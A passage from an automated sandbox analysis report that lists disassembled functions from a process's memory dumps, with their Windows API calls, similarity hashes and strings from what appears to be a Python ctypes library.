                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                          • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                          • Instruction ID: b6fc17f82ea6f7610bc2def2649a33250c391972a1e21e598bf871a10d6cc251
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E0E650F1D64B42FF967BF2A84517912D16FA4741B445034DD0DC7AD2DE2C64478211
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF641F39CE5,?,?,00000000,00007FF641F39D9A), ref: 00007FF641F39ED6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F39CE5,?,?,00000000,00007FF641F39D9A), ref: 00007FF641F39EE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF8B83134C9,?,?,?,00007FF8B83539B1,?,?,?,?,00007FF8B83178EA,?,?,?), ref: 00007FF8B830DD38
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF8B831C80C), ref: 00007FF8B831C9C4
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF8B831C80C), ref: 00007FF8B831CA19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF8B831C7FD
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C998: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF8B831C80C), ref: 00007FF8B831C9C4
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C998: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF8B831C80C), ref: 00007FF8B831CA19
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF8B831C823
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C93C: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF8B831C95C
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C838: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF8B831C89A
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C838: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF8B831C8B0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$FileHandleInfoStartupType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2762830733-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                          • Instruction ID: 3270407dd56f64c00c935922f4ac2cbafab8db6ed8d18d3db663aca53ca8f847
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4431A121A1CA5A82F793BB96D84137D66D0AB50BA0F510235DA2DC3BD2CF7CE4438722
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                          • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                          • Instruction ID: 1f5bcc6df5c3e40c86d574032baebb5652bf917652ab7c4211864aca8764092f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0218D32A19A098AEBA6BF64C4442AC33E0FB04358F84063AD61C97FD5DF3CE446C741
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                          • Instruction ID: 7803e39f6ace7022cd1eccb51aab0a5d076872be9ff92db3339b82ee7bbefd87
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE114D21A1D68982EBE2BF51D40127EA2E4BF95B80F444531EA4CD7EE6CE7CE5438742
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                          • Instruction ID: 0b4993eadb240eff9e31308cc93efaad151c2ca3aa4cd811f2099f78eab10ac3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721657261CA8686DBA2BF18E54037976E0EB94B94F544234E65D876E9DF3CE4028B00
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                          • Instruction ID: 1fca188380d8d8cbf2d343f46a9169c3744e155c63fe5170bf0f38dd6ecf2326
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D01E121A1C78641EB86FB5299000A9A6D4BB95FE0F484230DE6CC3FD6DE3DE1038300
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __vcrt_initialize_locks__vcrt_initialize_winapi_thunks
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2444027679-0
                                                                                                                                                                                                                          • Opcode ID: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                                          • Instruction ID: ef6b4eab6556568d4ed8887d9687d7f963a82f9b3ea5fd4c553fa640225c149f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08114921E09A0281FE615B2CE5903B96290AF08BE0F5C4139DB6D027D5DF2CF842C308
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F286B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF641F23FA4,00000000,00007FF641F21925), ref: 00007FF641F286E9
                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00007FF641F25C06,?,00007FF641F2308E), ref: 00007FF641F281C2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2592636585-0
                                                                                                                                                                                                                          • Opcode ID: ace902ef65350b9af860533caa3ca60103021c1a22cf1c7a98076d3fe7d09f40
                                                                                                                                                                                                                          • Instruction ID: f3434b07aaf472aac4bbe55ffb6a6ca010552c6c3f0cc91dcf095118e4f25d24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ace902ef65350b9af860533caa3ca60103021c1a22cf1c7a98076d3fe7d09f40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01D0C211F2868581FB95BBB7BA465796591AFC9BC0F888034EE1C43B96DC3CC0820B04
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF641F2FFB0,?,?,?,00007FF641F3161A,?,?,?,?,?,00007FF641F32E09), ref: 00007FF641F3C94A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                          • Instruction ID: a63ab22bec85efa9cdef0c46e86ea8ad5b15aa146ad1542fa0d7e3035dd720b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF05810B1E24F84FFD677B2591137916C05F98BA0F0A4231EC2FC7AC2EE2CA4638112
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Object_String$AttrDict_Long_LookupMallocMem_$CallDescr_ExceptionItemMatchesMemoryObjectOccurredSignSsize_tUpdate
                                                                                                                                                                                                                          • String ID: The '_length_' attribute is too large$The '_length_' attribute must be an integer$The '_length_' attribute must not be negative$_type_ must have storage info$array too large$class must define a '_length_' attribute$class must define a '_type_' attribute
                                                                                                                                                                                                                          • API String ID: 1094985414-504660705
                                                                                                                                                                                                                          • Opcode ID: 618371b017bfb42e6c387fd73ed1a77009a15e34f6dbbb0f99ccff6f8b3ed9d2
                                                                                                                                                                                                                          • Instruction ID: 1cc2590422f38699c30a79e7060a2033b72a207838e9d6d6c1ed8d98888d3b23
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618371b017bfb42e6c387fd73ed1a77009a15e34f6dbbb0f99ccff6f8b3ed9d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49A11921A0AB42D1FB54AFADD8942B937A4FF85BE4F184231DB1E466A5DF3CE495C300
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$FromNumber_OccurredSsize_tString$Mem_Unicode_$Bytes_CharMallocSizeWide$FreeList_Memory
                                                                                                                                                                                                                          • String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
                                                                                                                                                                                                                          • API String ID: 869507174-3059441807
                                                                                                                                                                                                                          • Opcode ID: 70b66605ccd097e78c16a38ef12c19642d171d9870e87ce71708b90003173da8
                                                                                                                                                                                                                          • Instruction ID: 5cbb4b5ce04246c051947a433738635de2deb1cf1a0f5f88263406dbd9a16d91
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70b66605ccd097e78c16a38ef12c19642d171d9870e87ce71708b90003173da8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDA14021B0AA4281FE949F9DD544179ABA9BF94FE0F044631CB6E47BF6EE2CE455C300
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mem_$CallDict_Err_FreeFunctionItemMallocObject_$DeallocErrorFromLong_OccurredStringUnicode_VoidWith
                                                                                                                                                                                                                          • String ID: LP_%s$_type_$must be a ctypes type$s(O){sO}$s(O){}
                                                                                                                                                                                                                          • API String ID: 2461613936-2311978994
                                                                                                                                                                                                                          • Opcode ID: b2117b3c44d5f46dd7f24c4b35abf2caf2fa320c46810db12cf49d07f67c91ee
                                                                                                                                                                                                                          • Instruction ID: b4ad54673fc8b1d8172b9d38bc554e71d6cc1d4556a3572efe2a1530a3bc00d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2117b3c44d5f46dd7f24c4b35abf2caf2fa320c46810db12cf49d07f67c91ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99513725E0EB0385FB159FADA9541B827A4AF86BE0F180635CB1E07BA6DF3CE444C310
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Bytes_Err_FromMem_SizeSlice_String$AdjustFreeIndicesMallocMemoryNumber_OccurredSsize_tUnpack
                                                                                                                                                                                                                          • String ID: indices must be integers
                                                                                                                                                                                                                          • API String ID: 1902650389-2024404580
                                                                                                                                                                                                                          • Opcode ID: 56fc218e470cc9290087d7e1a0b697a8edda5b0b6fe3fe085914f497f61d90d4
                                                                                                                                                                                                                          • Instruction ID: 0d280810565aaea33e96bd87a941ce62fe38f1e2b184a0ebf69715ad7d4b60bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56fc218e470cc9290087d7e1a0b697a8edda5b0b6fe3fe085914f497f61d90d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96715C26A0AA4681EF199FAED9441B86BB1FF84FE4B144131DF1E47BA9DE3DE445C300
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
